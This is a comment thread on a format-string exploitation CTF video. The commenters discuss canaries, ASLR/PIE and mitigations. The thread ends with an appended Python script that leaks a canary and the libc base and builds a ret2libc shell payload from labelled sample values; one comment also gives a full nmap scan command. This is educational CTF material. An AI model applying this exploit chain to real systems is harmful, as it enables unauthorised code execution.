An example of printf() format write exploit, from real CTF: th-cam.com/video/NOY_dc2fRbU/w-d-xo.html
14:05
Thanks for mentioning that it’s ok to struggle with this and that it takes a long time to learn. This helps with our motivation.
It is definitely OK to struggle with this! Binary exploitation is an extremely niche topic, in a field which already requires a lot of expertise (infosec). If you understand even the most basic concepts, you're in a very small minority on the planet! 🧠
Very clear and well explained! Always high-quality content, well done!
The system() function had a different address in my libc, but I was able to create the correct payload and it ran successfully on the first attempt. It might not seem like a difficult thing to do, but my clarity on this topic after doing it is a lot better. Thanks a lot for the precise and great explanation, sir. You are an amazing teacher.
Thanks mate! There's definitely been some changes as a lot of people have commented recently they've been unable to find the "pop rdi" gadget for some of the challenges. Glad you were able to get around it 🙂
This vulnerability is somewhat similar to a tcache poisoning attack. Anyway, very informative video, learnt a bunch of new things!
Awesome video it made me solve my first pwn ctf 😁
Great to hear! 👏
Loved it!
Hi, nice video. In this example you cannot overflow because of the canary? When I started watching the video I thought that you would leak the canary with the format string, but your approach to solving it was amazing. Thx for your time.
Exactly! We couldn't overflow the buffer without tripping the canary. However, we could use the format string vuln to leak the canary, then do a buffer overflow attack. That's covered in the next episode 😉
19:24 I was very confused at this point; turns out %7 is the offset of 'buffer' in the blog post :D
Guys, take care when you have to use single or double quotes when you generate the manual_payload. Your soul will depend on it. Make sure you have your payload between double quotes and the python command in single quotes (just like in the video at 21:13). I spent several hours finding this mistake. 🙃
"Your soul will depend on it" - love it 👌😂
Love your videos ❤
Can you make a video that explains stack pivoting and how to exploit it with a ret2libc 🥺
Good idea, noted! 💜
@_CryptoCat Is there a video on this topic?
@Mersal-tq9lm There's this old one, audio quality isn't great though: th-cam.com/video/p2U6cnGsfuw/w-d-xo.html
HackTheBox have a pivot challenge as well so if they retire it, I'll make a video on it at some point 😊
@_CryptoCat Awesome 👍
The vulnerabilities in this video series can be avoided if they check the size of input before putting into buffer and if they specify the format strings properly right?
Yep! In fact, in many cases just swapping an unsafe function for a safe one will do the trick, e.g. when you compile a C program with "gets()" it warns that the function is inherently dangerous and advises replacing it with "fgets()". Oh, and having strong binary protections enabled (stack canaries, DEP/NX, PIE, RO-GOT etc.) is a good idea too!
Why can't you do a video for the Redeemer machine in Starting Point?
Is this the new machine released today? Really bad timing lol. They released it the day I left the country grrrrr 😑 I'll be back in a week then will make a video! 😁
I am waiting for your video.
@kathikaran4472 🙏🥰
Can you please try the machine and tell me how to scan it? I have been trying for two days and I am not able to nmap it. Please try it and tell me how to nmap it.
@kathikaran4472 Yes mate! I did do the machine, I just can't make a video until next week. This should work for you to identify the service:
nmap -sV -sC -p- [ip address]
@CryptoCat It won't be rude to delete comments about questions I asked when I wasn't clear about something and then later got it right, will it? xD 😂
Not rude at all! Leaving your questions might help others though, you can edit with your update to say how you fixed it/understood it. Totally up to you though 😉
Thanks for your phenomenal explanation. Can you share your Patreon or PayPal? I would love to show my gratitude to you. Thanks so much!
Hey, thanks for the support! Please don't worry about payment though, I'm happy to make content for the community 🥰
Do you have content about heap exploits, sir?
No series but I have a couple of CTF vids: th-cam.com/video/U2OgL66-6BE/w-d-xo.html + th-cam.com/video/55jibxjUj3I/w-d-xo.html
What is the exploit if I enable ASLR? Would that enable PIE also?
If ASLR or PIE is enabled, you'd just need to leak an address before you could perform the exploit. If you check some of my pwn CTF videos, a lot of them have both ASLR+PIE enabled. Although ASLR and PIE are similar techniques, they don't need to be enabled together. You could have ASLR enabled (randomizing stack addresses) AND/OR PIE enabled (randomizing program sections). More info here: guyinatuxedo.github.io/5.1-mitigation_aslr_pie/index.html
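An added example, not code from the video or from the author, that ties together the two points discussed in this thread: leaking the stack canary with the format-string bug before overflowing the buffer (the reply above about the next episode), and leaking an address so the exploit still works with ASLR/PIE on (the reply just above). It goes a little beyond the specific challenge by doing both leaks from one %p dump and finishing with a ret2libc chain. It uses only the standard library (struct) rather than pwntools, and every value in it (the leak output, the %p positions, the 72-byte distance from the buffer to the canary, and all the libc offsets and gadget addresses) is a made-up sample value; on a real target you would read those from gdb, readelf and ROPgadget.

```python
"""
Exploit-construction logic for: format-string leak -> canary + libc base
-> stack overflow that preserves the canary -> ret2libc.
All addresses/offsets below are constructed sample values, not real ones.
"""
import struct


def p64(value):
    """Pack a 64-bit little-endian word (the same thing pwntools' p64 does)."""
    return struct.pack("<Q", value)


# --- Constructed sample data (hypothetical binary and libc) -----------------
# What printf("%6$p.%7$p.%8$p.%9$p") might print when the input is reflected:
SAMPLE_LEAK = "0x1.0x7ffd1c2d3e40.0x4f6a9b2c7d1e8f00.0x7f3b2c5a9d90"
CANARY_INDEX = 2            # position of the canary in the dump (found with gdb)
LIBC_LEAK_INDEX = 3         # a saved return address into libc, same dump
LIBC_LEAK_OFFSET = 0x29d90  # that address's distance from the libc base (sample)
LIBC_SYSTEM = 0x50d70       # sample libc offsets: system, "/bin/sh", gadgets
LIBC_BINSH = 0x1d8678
LIBC_POP_RDI = 0x2a3e5      # pop rdi ; ret
LIBC_RET = 0x29139          # lone ret, used to realign the stack
BUF_TO_CANARY = 72          # bytes from the start of the buffer to the canary


def parse_leak(output):
    """Turn the dotted hex words printed by the %p leak into integers."""
    return [int(tok, 16) for tok in output.strip().split(".")]


def extract_canary(words, index):
    """Pick the canary out of the dump and sanity-check it.

    On x86-64 glibc the lowest byte of the canary is always 0x00, so that
    string functions stop before it; a word without that property is not it.
    """
    canary = words[index]
    if canary & 0xFF != 0:
        raise ValueError(f"word {index} does not look like a canary: {canary:#x}")
    return canary


def libc_base(words, index, leak_offset):
    """Subtract the known offset from the leaked libc pointer to get the base.

    Mappings are page-aligned, so a base with non-zero low 12 bits means the
    offset (or the chosen %p index) is wrong for this libc build.
    """
    base = words[index] - leak_offset
    if base & 0xFFF:
        raise ValueError(f"libc base {base:#x} is not page-aligned, wrong offset?")
    return base


def build_ret2libc(canary, base, saved_rbp=0):
    """Overflow payload: padding, the real canary, a fake rbp, then the chain."""
    payload = b"A" * BUF_TO_CANARY
    payload += p64(canary)            # canary written back unchanged
    payload += p64(saved_rbp)         # saved rbp, any value works here
    payload += p64(base + LIBC_RET)   # extra ret keeps rsp 16-byte aligned
    payload += p64(base + LIBC_POP_RDI)
    payload += p64(base + LIBC_BINSH)  # rdi = "/bin/sh"
    payload += p64(base + LIBC_SYSTEM)
    return payload


def build_exploit(leak_output=SAMPLE_LEAK):
    """Full flow: parse the %p dump, recover canary and base, emit the payload."""
    words = parse_leak(leak_output)
    canary = extract_canary(words, CANARY_INDEX)
    base = libc_base(words, LIBC_LEAK_INDEX, LIBC_LEAK_OFFSET)
    return canary, base, build_ret2libc(canary, base)


if __name__ == "__main__":
    canary, base, payload = build_exploit()
    print(f"canary    = {canary:#018x}")
    print(f"libc base = {base:#x}")
    print(f"payload ({len(payload)} bytes): {payload.hex()}")
    # With pwntools you would then do: p.sendline(payload); p.interactive()
```

Two practical notes. The payload contains NUL bytes (the canary's low byte and the high bytes of every address), so it has to reach the program as raw bytes, e.g. written with sys.stdout.buffer.write() and piped in, not pasted into a terminal; the format-string input for the leak and the overflow input are two separate sends. The lone ret before pop rdi is the usual fix when system() crashes with a movaps fault, since the extra pop realigns the stack to 16 bytes.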